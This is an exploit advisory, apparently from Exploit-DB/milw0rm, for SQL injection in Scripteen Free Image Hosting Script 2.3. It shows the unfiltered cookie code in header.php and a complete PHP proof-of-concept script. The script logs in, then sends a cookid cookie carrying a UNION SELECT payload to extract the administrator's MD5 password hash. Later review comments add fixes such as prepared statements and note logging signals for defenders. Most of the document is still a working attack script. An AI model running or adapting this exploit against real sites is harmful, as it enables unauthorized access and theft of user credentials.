Scripteen Free Image Hosting Script 2.3 - SQL Injection

EDB-ID:

9252


Author:

Coksnuss

Type:

webapps


Platform:

PHP

Date:

2009-07-24


===================
Scripteen Free Image Hosting Script v2.3 - SQL Injection vulnerability
===================

The vulnerable code: header.php (lines 53-62)

	// NOTE(review): both identity values fall back to raw cookie values whenever the
	// session holds nothing. A client fully controls its own cookies, so a request
	// without a session can supply any userid/usergid it likes.
	$userid=$_SESSION['userid'];
	$usergid=$_SESSION['usergid'];
	// The three tests are redundant: empty() already covers unset, "" and other falsy values.
	if (!$userid || empty($userid) || $userid==""){
    		// Taken unvalidated; per the advisory the value reaches an SQL query.
    		// At minimum cast it with (int); better, pass it to a prepared statement.
    		$userid = $_COOKIE['cookid'];
	}
	if (!$usergid || empty($usergid) || $usergid==""){
    		// Same issue as cookid above.
    		$usergid = $_COOKIE['cookgid'];
	}

As you can see, $_COOKIE['cookid'] and $_COOKIE['cookgid'] are not filtered and can be used for SQL injection.

===================
Proof of concept
===================
<?php
// *************************************
// Global variables
// *************************************
// Command-line options. Each one is false when the caller did not supply it, which
// is what the help check below tests for.
$g_arguments = getArguments();
$g_url      = false;
$g_username = false;
$g_password = false;
if (isset($g_arguments['url'])) {
	$g_url = $g_arguments['url'];
}
if (isset($g_arguments['username'])) {
	$g_username = $g_arguments['username'];
}
if (isset($g_arguments['password'])) {
	$g_password = $g_arguments['password'];
}
// *************************************

// *************************************
// Print help
// *************************************
// Usage text, printed on --help or when any required option is missing (each
// missing option is false); the script stops afterwards.
if (isset($g_arguments['help']) || in_array(false, array($g_url, $g_username, $g_password), true))
{
	$banner = array(
		"###################################",
		"#                                  ",
		"# Scripteen Free Image Hosting V2.3",
		"#      SQL Injection Exploit       ",
		"#      Discovered by Coksnuss      ",
		"#      POC script by Coksnuss      ",
		"#                                  ",
		"###################################",
	);
	$usage = array(
		"Usage: " . $argv[0],
		"\t--help - This help",
		"\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)",
		"\t--username=[STR] - A valid username to login",
		"\t--password=[STR] - A valid password to login",
	);
	echo implode("\n", $banner) . "\n";
	echo implode("\n", $usage) . "\n";
	die();
}
// *************************************


// *************************************
// Main
// *************************************
// Main flow: (1) log in with the supplied credentials and keep the session cookie,
// (2) read the caller's own userid from profile.php, (3) request profile.php again
// with a cookid cookie that carries SQL. For defenders the request in step 3 is the
// signal to look for in access/WAF logs: a cookie that should hold a small integer
// arriving with SQL keywords in it. Server-side, casting cookid/cookgid to int (or
// using a prepared statement) closes the hole.

// Strip a trailing script name and slash from the supplied URL.
$url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url;
if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1);

// Step 1: log in via login.php and persist the resulting cookies.
echo "Generate cookie...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/login.php');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// Session cookies are written in cleartext to cookie.txt beside the script and are
// never removed afterwards.
curl_setopt($curl, CURLOPT_COOKIEJAR,	dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_POST,	true);
curl_setopt($curl, CURLOPT_POSTFIELDS,	'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password));

$ret = curl_exec($curl);
curl_close($curl);

// Best-effort version check: collect every "d.d" token in the login page.
// NOTE(review): array_search() returns the matching index, so a '2.3' found at
// index 0 is treated as "not found" and the warning fires wrongly; the intended
// test is `=== false`.
preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches);
if(!array_search('2.3', $matches[1]))
	echo("\nWarning: It seems like this site do not use version 2.3 of the Scripteen Free Image Hosting Script!\n");

// A missing cookie jar means curl is unavailable or the directory is not writable.
if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'))
	die('Be sure that you\'ve enabled CURL and have write permission in the script directory!');

echo "DONE\n";

// Step 2: fetch profile.php with the stored session and read the userid back from
// a hidden form field ([\d]{1,3} limits it to three digits).
echo "Get userid...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIEFILE,	dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match))
	die('Couldn\'t retrieve userid! Check your login data again!');

$userid = $match[1];
echo "DONE (" . $userid . ")\n";

// Step 3: the cookid cookie is replaced by the unfiltered value header.php falls back
// to when the session is empty (see the vulnerable snippet above).
// cookpass is an unsalted MD5 of the password and the regex below expects a 32-char
// hex value, so the application apparently stores passwords as plain MD5 — a second
// weakness to fix alongside the injection (password_hash()/password_verify()).
echo "Get the passwordhash from userid 1...\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIE,	'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

// The injected column is echoed back in the uname field of the profile form.
if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match))
	die('Couldn\'t find the password hash!');

echo "Hash found: " . $match[1] . "\n";
// *************************************


// *************************************
// Global functions
// *************************************
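/**
 * Parses the CLI arguments in $argv into an associative array.
 *
 * "--name=value" becomes $args['name'] = 'value' (the value is kept verbatim,
 * including any further '=' characters); a bare "--flag" becomes
 * $args['flag'] = true. The script name ($argv[0]) is stored under key 0.
 * Anything else is ignored.
 *
 * Fixes: the result is initialised, so an empty or missing $argv yields an
 * empty array instead of null (and no foreach-on-null warning); an option with
 * an empty name ("--" or "--=x") is skipped instead of being stored under a
 * key that could collide with the script-name entry.
 *
 * @return array<int|string, string|true>
 */
function getArguments()
{
	global $argv;

	$args = array();
	$argList = is_array($argv) ? $argv : array();

	foreach ($argList as $arg)
	{
		if (substr($arg, 0, 2) !== '--')
		{
			// Not an option: only the script name itself is recorded.
			if ($arg === $argList[0])
			{
				$args[0] = $argList[0];
			}
			continue;
		}

		$pos = strpos($arg, '=');
		if ($pos !== false)
		{
			// --name=value
			$name = substr($arg, 2, $pos - 2);
			$value = substr($arg, $pos + 1);
		}
		else
		{
			// --flag
			$name = substr($arg, 2);
			$value = true;
		}

		// substr() yields '' (or false on older PHP) when nothing follows "--".
		if ($name === '' || $name === false)
		{
			continue;
		}

		$args[$name] = $value;
	}

	return $args;
}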
// *************************************
?>

# milw0rm.com [2009-07-24]